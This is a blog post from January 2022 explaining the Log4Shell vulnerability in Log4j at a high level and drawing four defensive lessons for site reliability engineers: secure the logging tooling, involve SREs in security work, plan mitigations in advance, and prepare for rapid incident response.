What Log4j Vulnerability Means for SREs?

Weihan Li

January 7, 2022

What Log4j Vulnerability Means for SREs?

If you’re an SRE, you’ve almost certainly heard all about Log4Shell, the Log4j vulnerability that some analysts are calling the worst software security flaw in decades. And you’ve also hopefully by now patched any systems you manage to fix the vulnerability (if you haven’t, go do that right away!).

Even after you’ve patched Log4Shell in your environments, though, you shouldn’t put the vulnerability in the back of your mind. For SREs, there are some important lessons to glean from this fiasco.

Toward that end, here’s a look at four key takeaways from Log4Shell for SREs.

Log4Shell in a nutshell

Let’s start with a brief overview of what happened.

Log4Shell is a vulnerability that enables remote code execution within applications that use Log4j, a Java-based logging framework. By inserting malicious strings into the Java Naming and Directory Interface (JNDI) that Log4j uses, attackers can inject malicious code into an application from an LDAP server.

As vulnerabilities go, this is a very bad one. It’s not particularly hard to exploit, and it gives attackers essentially a blank check when it comes to what they can do once they’ve breached an app.

The good news is that not all versions of Log4j are affected (although many – specifically, versions 2.0-beta9 to 2.14.1 – are). You can use this scanner to check whether the Java applications you run are subject to the vulnerability – although a best practice is simply to assume your applications are vulnerable and patch them immediately. It’s better to waste a little time patching a non-vulnerable application than it is to waste time figuring out whether your application is vulnerable, only to discover that it is and has been exploited while you were busy scanning it.

After all, it’s clear that the bad guys are already working hard to identify and exploit apps that are vulnerable to Log4Shell.

What SREs can learn from Log4Shell

Beyond underlining the importance of being aware of software vulnerabilities and patching them as quickly as possible, the Log4Shell fiasco offers additional lessons for SREs.

Secure your observability tooling

From an SRE’s perspective, Log4Shell is interesting because it targets a category of tooling that is central to the work SREs perform: Logging and observability.

That’s not to say that observability tools or frameworks pose special security risks, of course. Any type of software can be hacked.

Still, Log4Shell serves as a reminder that it’s not just application cores that need to be secured. You must also think about the ancillary tooling – including logging frameworks like Log4j – that drives your application.

This risk is especially worth noting because we’re likely to see more and more logging and observability tooling deployed in the future, as SREs have to work harder and harder to keep tabs on what is happening within the complex systems they manage. And more tooling means more potential vulnerabilities.

Involve SREs in security

We’ve said it before, and the Log4Shell affair presents a great opportunity to say it again: SREs need to be centrally involved in security operations, despite the fact that they are often left out of the DevSecOps conversation.

After all, without the participation of SREs, it’s hard to imagine organizations moving to apply patches for vulnerabilities like Log4Shell quickly. The teams that reacted fastest are no doubt those where SREs and security engineers were already trained to collaborate closely before the security incident arose.

Plan ahead for mitigation strategies

Fortunately, in the case of Log4Shell, a patch to address the vulnerability became available immediately.

But if that hadn’t happened, organizations that use Log4j for critical applications would have found themselves in the dangerous situation of having to run vulnerable software and hope a fix arrived soon – unless they had planned ahead and were able to disable the Log4j framework within their environments while waiting for a fix.

The point here is that it’s a best practice to assume that any tool or layer within your stack may need to be taken offline unexpectedly for security or other reasons. SREs who design software environments (by, for example, making maximum use of modularity) with this reality in mind place their organizations in a stronger position to react to the unforeseen – which is precisely what reliability management is all about.

Rapid incident response is critical

The importance of being able to react quickly to incidents of any type – whether they involve security issues or reliability and performance problems – almost goes without saying. But we’ll say it anyway because it’s easy to fall into the trap of ignoring the significance of an incident response plan until disaster strikes.

So, if you don’t already have plans and tools in place to ensure that your team can react quickly to whatever incidents arise, the Log4Shell fiasco is as good a reminder as any that you should invest in those resources now. Don’t wait until you’re in the midst of a critical incident to figure out how to respond efficiently.

Conclusion

Even if you’ve applied your patches and put Log4Shell behind you, you know it’s only a matter of time before another critical vulnerability arises.

You have no way of knowing exactly what that vulnerability will be or which systems it can affect. Nonetheless, you can put your team in the strongest position possible by ensuring that your SREs are plugged into security and DevSecOps processes on a continuous basis. Paying attention to the security implications of ancillary tooling (like logging frameworks), as well as planning in advance for events that require critical systems to be taken offline or temporarily disabled, will go a long way toward enabling a strong security stance, too.